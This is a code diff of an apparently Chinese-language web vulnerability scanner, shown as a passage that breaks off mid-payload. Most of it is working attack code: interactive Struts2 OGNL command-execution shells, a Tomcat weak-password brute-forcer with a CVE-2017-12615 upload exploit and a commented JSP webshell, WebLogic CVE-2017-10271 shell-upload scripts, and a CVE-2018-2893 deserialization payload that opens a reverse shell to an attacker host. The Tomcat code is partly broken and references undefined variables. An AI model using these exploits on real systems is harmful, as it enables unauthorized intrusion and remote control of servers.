            self.url = self.url.replace("/actionChain1.action", "/${12345%2a54321}/actionChain1.action")
            req = requests.get(self.url, timeout=6, verify=False, allow_redirects=True)
            if r"670592745" in req.url:
                cprint("目标存在struts2-057漏洞..(只提供检测)", "red")
            else:
                cprint("目标不存在struts2-057漏洞..(只提供检测)", "green")
        except Exception as e:
            cprint("检测struts2-057超时..", "cyan")
            print("超时原因: ", e)
    def inShell(self, pocname):
        cprint('''Code by Lucifer.''', 'cyan')
        cprint("-------struts2 交互式shell--------\n目标url:"+self.url, "cyan")
        prompt = "shell >>"
        if pocname == "struts2-005":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url
                        req = requests.post(commurl, data=self.shell['struts2-005'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-009":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url
                        req = requests.post(commurl, data=self.shell['struts2-009'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-013":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url
                        req = requests.post(commurl, data=self.shell['struts2-013'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-016":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url
                        req = requests.post(commurl, data=self.shell['struts2-016'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-019":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        command = re.sub(r"\s{2,}", " ", command).replace(" ", "','")
                        req = requests.post(self.url, data=self.shell['struts2-019'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-devmode":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url+self.shell['struts2-devmode'].replace("FUZZINGCOMMAND", command)
                        req = requests.get(commurl, headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-032":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url+self.shell['struts2-032'].replace("FUZZINGCOMMAND", command)
                        req = requests.get(commurl, headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-033":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url+self.shell['struts2-033'].replace("FUZZINGCOMMAND", command)
                        req = requests.get(commurl, headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-037":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        commurl = self.url+self.shell['struts2-037'].replace("FUZZINGCOMMAND", command)
                        req = requests.get(commurl, headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-045":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    headers_exp = {
                         "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
                         "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
                         "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
                         }
                    try:
                        req = requests.get(self.url, headers=headers_exp, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-046":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000"
                        files ={"test":(uploadexp, "text/plain")}
                        req = requests.post(self.url, files=files, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-048":
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action"
                        postdata = {
                            "name":self.shell['struts2-048'].replace("FUZZINGCOMMAND", command),
                            "age":"1",
                            "__checkbox_bustedBefore":"true",
                            "description":"1",
                        }
                        req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False)
                        print(req.text)
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
        if pocname == "struts2-053":
            param = input("请指定struts2-053参数: ")
            while True:
                print(prompt, end=' ')
                command = input()
                command = command.strip()
                if command != "exit":
                    try:
                        vulnurl = self.url + "?" + param + "=" + self.shell['struts2-053'].replace("FUZZINGCOMMAND", command)
                        req = requests.get(vulnurl, headers=headers, timeout=6, verify=False)
                        pattern = r'81dc9bdb52d04dc2([\s\S]*)0036dbd8313ed055'
                        m = re.search(pattern,req.text)
                        if m:
                            print(m.group(1).strip())
                        print("\n")
                    except:
                        cprint("命令执行失败!!!", "red")
                else:
                    sys.exit(1)
 if __name__ == "__main__":
    filecontent = open("success.txt", "a+")
    try:
        if sys.argv[1] == "-f":
            with open(sys.argv[2]) as f:
                for line in f.readlines():
                    line = line.strip()
                    strutsVuln = struts_baseverify(line)
                    strutsVuln.scan()
        elif sys.argv[1] == "-u" and sys.argv[3] == "-i":
            strutsVuln = struts_baseverify(sys.argv[2].strip())
            strutsVuln.inShell(sys.argv[4].strip())
        else:
            strutsVuln = struts_baseverify(sys.argv[1].strip())
            strutsVuln.scan()
    except Exception as e:
        figlet = '''Code by Lucifer.'''
        cprint(figlet,'cyan')
        print("Usage: python struts-scan.py http://example.com/index.action  检测")
        print("       python struts-scan.py -u http://example.com/index.action -i struts2-045 进入指定漏洞交互式shell")
        print("       python struts-scan.py -f url.txt  批量检测")
 def struts2_special_plugin_(arg,config):
    print(arg.url)
    struts_baseverify(arg.url).scan()
--- a/plugins/test.py
+++ b/plugins/test.py
@@ -1,7 +0,0 @@
--- a/plugins/tomcat_plugin.py
+++ b/plugins/tomcat_plugin.py
@@ -0,0 +1,15 @@
 #coding=utf-8
 pocs=[
    {"requests_option":"",
     "url":["/manager/html/upload"],
     "params":[],
     "data":[],
     "flag":[],
     "success":"",
     "fail":"",
     "end":"",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
 ]
--- a/plugins/tomcat_special_plugin_.py
+++ b/plugins/tomcat_special_plugin_.py
@@ -0,0 +1,84 @@
 #coding=utf-8
 import urllib.request, urllib.error, urllib.parse
 import base64
 import requests
 import uuid
 from termcolor import cprint
 from urllib.parse import urlparse
 from concurrent.futures import ThreadPoolExecutor
 def requests_post(url,username,password,flag_list):
    try:
        login_url = url + '/manager/html'
        auth_str_temp = user + ':' + password
        auth_str_temp = bytes(auth_str_temp, encoding="utf8")
        auth_str = base64.b64encode(auth_str_temp)
        auth_str = str(auth_str, encoding="utf8")
        headers = {'Authorization': 'Basic ' + auth_str}
        res = requests.post(url=login_url, headers=headers, timeout=config.Timeout)
        success_num=0
        for flag in flag_list:
            if flag in res_html:
                success_num=success_num+1
                info = '%s Tomcat Weak password %s:%s' % (login_url, user, password)
        if success_num>0:
            print(info)
    except Exception:
        pass
 def crack_password(arg,config):
    url = "http://%s"%(arg.url)
    print("对tomcat weak password 进行检测")
    flag_list=['Application Manager','Welcome']
    user_list=['admin','manager','tomcat','apache','root']
    pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root']
    with ThreadPoolExecutor(config.ThreadNum) as excetor:
        for user in user_list:
            for password in pass_list:
                try:
                    excetor.submit(requests_post(arg.url, user, password, flag_list))
                except Exception:
                    pass
 '''
 http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
 https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
 https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
 '''
 #脚本来自：https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py
 class Exploit:
    def attack(self, url):
        uu = uuid.uuid4()
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
        }
        # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
        # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
        body = '''<%out.print("test");%>'''
        url_parse = urlparse(url)
        url = r'http://' + url if url_parse.scheme == '' else url
        put_url = r'{}/{}.jsp/'.format(url,uu)
        try:
            res = requests.put(put_url,data=body,headers=headers)
            code = res.status_code
            if code == 201:
                print('[+]access : {}'.format(put_url[:-1]))
                access_url = put_url[:-1]
                whoami = requests.get(access_url).text
                if r"test" in whoami:
                    print("[+]存在Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）漏洞...(高危)\tpayload: " + access_url)
                else:
                    print("[+]不存在Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）漏洞...(高危)")
            else:
                return None
        except Exception as e:
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
 def tomcat_special_plugin_(arg,config):
    Exploit().attack(arg.url)
    crack_password(arg,config)
--- a/plugins/user_agent.py
+++ b/plugins/user_agent.py
@@ -232,6 +232,6 @@ def get_user_agent():
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/11.10 Chromium/18.0.1025.142 Chrome/18.0.1025.142 Safari/535.19',
        'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00'
    ]
-    return random.choice(user_agents)
+    return {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Connection": "keep-alive","User-Agent":random.choice(user_agents)}
--- a/plugins/weblogic_exp/CVE_2017_10271_linux.py
+++ b/plugins/weblogic_exp/CVE_2017_10271_linux.py
@@ -0,0 +1,150 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import requests
 import argparse
 import time
 import base64
 proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
 headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
 timeout = 5
 '''
 payload的格式化
 '''
 def payload_command(command_in,output_file,os):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    #命令执行回显：将命令执行的结果输出到文件中
    #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file)
    command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file)
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in_payload)+"</string>"
    #XMLDecoder反序列化payload:
    cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe'
    cmd_param = '-c' if os == 'linux' else '/c'
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                "   <soapenv:Header> " \
                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
                "                  <array class=\"java.lang.String\" length=\"3\">" \
                "                      <void index = \"0\">                       " \
                "                          <string>{}</string>                 " \
                "                      </void>                                    " \
                "                      <void index = \"1\">                       " \
                "                          <string>{}</string>                  " \
                "                      </void>                                    " \
                "                      <void index = \"2\">                       ".format(cmd_app,cmd_param) \
                + command_filtered + \
                "                      </void>                                    " \
                "                  </array>" \
                "                  <void method=\"start\"/>" \
                "                  </void>" \
                "            </java>" \
                "        </work:WorkContext>" \
                "   </soapenv:Header>" \
                "   <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1
 '''
 得到命令执行的回显结果
 '''
 def get_output(target,output_file):
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    #url增加时间戳避免数据是上一次的结果缓存
    output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time()))
    try:
        r = requests.get(output_url,headers = headers,proxies=proxies,timeout=timeout,verify=False)
        if r.status_code == requests.codes.ok:
            return (True,(r.text.strip()))
        elif r.status_code == 404:
            return (False,'404 no output')
        else:
            return (False,r.status_code)
    except Exception,ex:
        #raise
        return (False,str(ex))
 '''
 RCE
 '''
 def weblogic_rce(target,cmd,output_file,os='linux'):
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    url = '{}/wls-wsat/CoordinatorPortType'.format(target)
    #content-type必须为text/xml
    payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
    msg = ''
    try:
        r = requests.post(url, payload_command(cmd,output_file,os),headers = payload_header,verify=False,timeout=timeout,proxies=proxies)
        #500时说明已成功反序列化执行命令
        if r.status_code == 500:
            #delay一下，保证命令执行完整性：
            time.sleep(1)
            return get_output(target,output_file)
        elif r.status_code == 404:
            return (False,'404 no vulnerability')
        else:
            return (False,'{} something went wrong'.format(r.status_code))
    except requests.exceptions.ReadTimeout:
        return (False,'timeout')
    except Exception,ex:
        #raise
        return (False,str(ex))
 '''
 getshell
 '''
 def weblogic_getshell(target,output_file,shell_file,os='linux'):
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    with open(shell_file) as f:
        cmd = 'echo {}|base64 -d'.format(base64.b64encode(f.read()))
        status,result = weblogic_rce(target,cmd,output_file,os)
        if status:
            print '[+]shell-> {}/bea_wls_internal/{}'.format(target,output_file)
        return (status,result)
 '''
 main
 '''
 def main():
    global proxies
    parse = argparse.ArgumentParser()
    parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)')
    parse.add_argument('-c', '--cmd', required=False,default='id', help='command to execute,default is "id"')
    parse.add_argument('-o', '--output', required=False,default='output.txt', help='output file name,default is output.txt')
    parse.add_argument('-s', '--shell', required = False,default='',help='local jsp file name to upload,and set -o xxx.jsp')
    parse.add_argument('--os',choices=['linux','win'],default='linux',help='host os:linux or win,default is linux')    
    parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy')
    args = parse.parse_args()
    #是否使用proxy
    if not args.proxy:
        proxies = None
    if args.shell!='':
        status,result = weblogic_getshell(args.target,args.output,args.shell,args.os)
    else:
        status,result = weblogic_rce(args.target,args.cmd,args.output,args.os)
    #output result:
    if status:
        print result
    else:
        print '[-]FAIL:{}'.format(result)
 if __name__ == '__main__':
    main()
--- a/plugins/weblogic_exp/CVE_2017_10271_win.py
+++ b/plugins/weblogic_exp/CVE_2017_10271_win.py
@@ -0,0 +1,121 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import requests
 import argparse
 import time
 import base64
 proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
 headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
 timeout = 5
 '''
 payload的格式化
 '''
 def payload_command(shell_file,output_file):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    with open(shell_file) as f:
        shell_context = f.read()
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in shell_context)+"</string>"
    payload_1 = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java>
    <java version="1.6.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter">
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}</string>
    <void method="println">{}</void><void method="close"/>
    </object>
    </java>
    </java>
    </work:WorkContext>
    </soapenv:Header><soapenv:Body/></soapenv:Envelope>'''.format(output_file,command_filtered)
    return payload_1
 '''
 命令执行
 '''
 def execute_cmd(target,output_file,command):
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    #url增加时间戳避免数据是上一次的结果缓存
    output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time()))
    data = {'c':command}
    try:
        r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout)
        if r.status_code == requests.codes.ok:
            return (True,r.text.strip())
        elif r.status_code == 404:
            return (False,'404 no output')
        else:
            return (False,r.status_code)
    except requests.exceptions.ReadTimeout:
        return (False,'timeout')
    except Exception,ex:
        #raise
        return (False,str(ex))
 '''
 RCE：上传命令执行的shell文件
 '''
 def weblogic_rce(target,cmd,output_file,shell_file):
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    url = '{}/wls-wsat/CoordinatorPortType'.format(target)
    #content-type必须为text/xml
    payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
    msg = ''
    try:
        r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies)
        #500时说明已成功反序列化执行命令
        if r.status_code == 500:
            return execute_cmd(target,output_file,cmd)
        elif r.status_code == 404:
            return (False,'404 no vulnerability')
        else:
            return (False,'{} something went wrong'.format(r.status_code))
    except requests.exceptions.ReadTimeout:
        return (False,'timeout')
    except Exception,ex:
        #raise
        return (False,str(ex))
 '''
 main
 '''
 def main():
    global proxies
    parse = argparse.ArgumentParser()
    parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)')
    parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"')
    parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp')
    parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload')
    parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy')
    args = parse.parse_args()
    #是否使用proxy
    if not args.proxy:
        proxies = None
    status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell)
    #output result:
    if status:
        print result
    else:
        print '[-]FAIL:{}'.format(result)
 if __name__ == '__main__':
    main()
--- a/plugins/weblogic_exp/CVE_2018_2893.py
+++ b/plugins/weblogic_exp/CVE_2018_2893.py
@@ -0,0 +1,73 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 '''
 ____       _     _     _ _   __  __           _
 |  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
 | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
 |  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
 |_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
 '''
 import socket
 import os
 import sys
 import struct
 '''
 可以直接反弹shell
 监听
    nc -lvvp reverse_port
 发送payload
    python weblogic.py target_host target_port reverse_host reverse_port
 '''
 if len(sys.argv) < 4:
    print 'Usage: python %s <host> <port> <reverse_host> <reverse_port>' % os.path.basename(sys.argv[0])
    sys.exit()
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 sock.settimeout(5)
 host = sys.argv[1]
 port = int(sys.argv[2])
 server_address = (host, port)
 print '[+] Connecting to %s port %s' % server_address
 sock.connect(server_address)
 reverse_host = sys.argv[3]
 reverse_port = int(sys.argv[4])
 # Send headers
 headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
 print 'sending "%s"' % headers
 sock.sendall(headers)
 data = sock.recv(1024)
 print >>sys.stderr, 'received "%s"' % data
 def padhex(s):
 	s = s.strip('0x')
 	if len(s) %2 !=0:
 		return '0'+s
 	else:
 		return s
 host_hex = padhex(hex(len(reverse_host))+reverse_host.encode('hex'))
 port_hex = padhex(hex(reverse_port))
 payloadObj = """aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000078707372003e6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017572000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd0200007870000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e001c4c0004686f737471007e001c4c000870726f746f636f6c71007e001c4c000372656671007e001c7870ffffffffffffffff74000f3137362e3132322e3135372e3131307400132f4a657852656d6f7465546f6f6c732e6a617271007e001e740004687474707078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000017671007e00197372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677371007e00144c000b694d6574686f644e616d6571007e001c5b000b69506172616d547970657371007e001578707571007e00170000000174000a4a6578526576657273657400096c6f6164436c6173737571007e002100000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e0017000000027400%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex)
 payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x